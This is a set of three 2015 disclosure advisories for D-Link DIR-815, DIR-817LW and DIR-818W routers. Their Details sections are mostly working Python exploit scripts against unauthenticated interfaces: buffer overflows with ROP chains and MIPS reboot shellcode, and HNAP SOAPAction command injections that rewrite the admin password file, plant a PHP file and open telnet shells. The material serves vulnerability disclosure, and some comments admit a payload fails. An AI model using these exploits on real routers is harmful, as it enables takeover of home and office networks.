## Advisory Information

Title: DIR-815 Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None

Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, 
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061

However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.

## Product Description

DIR-815 -- Wireless N300 Dual Band Router. Mainly used by home and small offices.

## Vulnerabilities Summary

Have come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed.

## Details

Buffer overflow in auth 
---------------------------------------------------------------------
import urllib
import urllib2

# This exploits the auth_main.cgi with read buffer overflow exploit for v2.02
# prequisite is just to have id and password fields in params

url = 'http://192.168.0.1/authentication.cgi'
junk = "A"*1004+"B"*37+"\x58\xf8\x40\x00" # address of system function in executable
junk+="X"*164+'echo  "Admin" "Admin" "0" > /var/passwd\x00'+"AAAA"
values = "id=test&password=test&test="+junk


req = urllib2.Request(url, values)
response = urllib2.urlopen(req)
the_page = response.read()

--------------------------------------------------------------------

Buffer overflow in HNAP
---------------------------------------------------------------------
import socket
import struct


# format junk+ROP1(have right value in A0) + ROP2(add or subtract to create right system address) + ROP3(Jump to right address)

buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"H"*286 
buf+= "\x40\xF4\xB1\x2A" # (ROP gadget which puts right value in A0)
buf+= "B"*20+"ZZZZ"+"telnetd -p 6778"+"C"*5 # adjustment to get to the right payload
buf+="\xA0\xb2\xb4\x2a" # The system address is 2Ab4b200 so changing that in GDB just before jumping to test if it works which it does not
buf+= "\r\n" + "1\r\n\r\n"
 
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4", 80))
s.send(buf)

--------------------------------------------------------------------

Command injection in 
--------------------------------------------------------------------
import socket
import struct

# CSRF or any other trickery, but probably only works when connected to network I suppose 

buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 99.249.143.124\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n"
 
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.1", 80))
s.send(buf)

--------------------------------------------------------------------
## Report Timeline

* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.

## Credit

This vulnerability was found by Samuel Huntley

## Advisory Information

Title: DIR-817LW Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None

Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, 
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061

However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.  

## Product Description

DIR-817LW -- Wireless AC750 Dual Band Cloud Router. Mainly used by home and small offices.

## Vulnerabilities Summary

Have come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed.

## Details

Buffer overflow in auth 
--------------------------------------------------------------------
import socket
import struct

#Reboot shellcode in there


buf = "GET /dws/api/Login?id="
buf+="A"*2064+"AAAA" #s0 # uclibc system address
buf+="\x2A\xAF\xD0\x84" #s1 -- points to iret
buf+="\x2A\xB1\x4D\xF0" #s2 -- points to sleep
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xB0\xDE\x54" # s6 filled up with pointer to rop4 which is ultimate mission
buf+="\x2A\xB1\x4D\xF0"
buf+="\x2A\xAC\xAD\x70" # Retn address  ROP gadget 1 that loads into $a0
buf+="C"*36 # 
buf+="\x2A\xAC\xD5\xB4" # points to rop3 
#buf+="1"*17 # exit payload
buf+="E"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #reboot big endian 
buf+="Y"*120 # ROP gadget 2 that loads into $t9
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nContent-Length:5000\r\n\r\nid="+"A"*5000+"\r\n\r\n"
 
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.8", 80))
s.send(buf)

----------------------------------------------------------------------------------------------------------------------


Buffer overflow in HNAP
----------------------------------------------------------------------------------------------------------------------
import socket
import struct

# Working

buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"B"*158
buf+="\x2A\xAF\xD0\x84" #s1 -- points to iret
buf+="\x2A\xB1\x4D\xF0" #s2 -- points to sleep
buf+="AAAA"+"AAAA"+"AAAA" #s3,s4,s5
buf+="\x2A\xB0\xDE\x54" # s6 filled up with pointer to rop4 which is ultimate mission
buf+="AAAA"
buf+="\x2A\xAC\xAD\x70" # Retn address  ROP gadget 1 that loads into $a0
buf+="C"*36
buf+="\x2A\xAC\xD5\xB4" # points to rop3 
buf+="C"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #reboot big endian shell
buf+="B"*28+"\r\n" + "1\r\n\r\n"
 
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.8", 80))
s.send(buf)
---------------------------------------------------------------------
Command injection 
--------------------------------------------------------------------
import socket
import struct

# CSRF or any other trickery, but probably only works when connected to network I suppose and internal

buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';echo "<?phpinfo?>" > passwd1.php;telnetd -p 9090;test\r\n' + "1\r\n\r\n"
 
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("1.2.3.4", 80))
s.send(buf)

----------------------------------------------------------------------

## Report Timeline

* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.

## Credit

This vulnerability was found by Samuel Huntley

## Advisory Information

Title: DIR-818W Buffer overflows and Command injection in authentication and HNAP functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None


Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, 
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061

However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. 

## Product Description

DIR-818W -- Wireless AC750 Dual Band Gigabit Cloud Router. Mainly used by home and small offices.

## Vulnerabilities Summary

Have come across 3 security issues in DIR-818W firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed.

## Details

Buffer overflow in auth 
--------------------------------------------------------------------
import socket
import struct

#Reboot shellcode in there
'''
2096 after id GET param, you can control the RA
'''

buf = "GET /dws/api/Login?id="
buf+="A"*2064+"AAAA" #S0 # uclibc system address
buf+="\x2A\xAF\xD0\x84" #S1 -- ROP2 (Pulls Sleep address from S2 which is also stored there before, loads SP+36 is filled in RA with ROP3 and calls Sleep)
buf+="\x2A\xB1\x4D\xF0" #S2 -- points to Sleep in library
buf+="\x2A\xB1\x4D\xF0" #JUNK S3
buf+="\x2A\xB1\x4D\xF0" #JUNK S4
buf+="\x2A\xB1\x4D\xF0" #JUNK S5
buf+="\x2A\xB0\xDE\x54" # S6 filled up with pointer to ROP4 which is ultimate mission
buf+="\x2A\xB1\x4D\xF0" #JUNK S7
buf+="\x2A\xAC\xAD\x70" # RETN address -- ROP1 (fills a0 with 3 for sleep and s1 is filled before with ROP2 address which is called)
buf+="C"*36 # 
buf+="\x2A\xAC\xD5\xB4" # ROP3 (Fills in S4 the address of SP+16 and then jumps to ROP4 which calls SP+16 stored in S4)
buf+="E"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #Reboot shellcode Big endian 
buf+="Y"*120 
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nContent-Length:5000\r\n\r\nid="+"A"*5000+"\r\n\r\n"
 
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)

----------------------------------------------------------------------


Buffer overflow in HNAP
----------------------------------------------------------------------
import socket
import struct

'''
548 characters after SOapaction:http://purenetworks.com/HNAP1/GetDeviceSettings/ should work, although sprintf copies twice so only 242 characters are required including /var/run and /etc/templates/hnap which is concatenated with your string to create 548 characters
'''

buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"B"*158
buf+="\x2A\xAF\xD0\x84" #S1 -- ROP2 (Pulls Sleep address from S2 which is also stored there before, loads SP+36 is filled in RA with ROP3 and calls Sleep)
buf+="\x2A\xB1\x4D\xF0" #S2 -- points to Sleep in library
buf+="AAAA"+"AAAA"+"AAAA" #s3,s4,s5 JUNK
buf+="\x2A\xB0\xDE\x54" # S6 filled up with pointer to ROP4 which is ultimate mission
buf+="AAAA" #s7 JUNK
buf+="\x2A\xAC\xAD\x70" # RETN address -- ROP1 (fills a0 with 3 for sleep and s1 is filled before with ROP2 address which is called)
buf+="C"*36
buf+="\x2A\xAC\xD5\xB4" # ROP3 (Fills in S4 the address of SP+16 and then jumps to ROP4 which calls SP+16 stored in S4)
buf+="C"*16
buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #Reboot shellcode Big endian 
buf+="B"*28+"\r\n" + "1\r\n\r\n"
 
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)

-------------------------------------------------------------------
Command injection 
---------------------------------------------------------------------
import socket
import struct

# CSRF or any other trickery, but probably only works when connected to network I suppose for v2.02

buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n"
 
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------
## Report Timeline

* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.

## Credit

This vulnerability was found by Samuel Huntley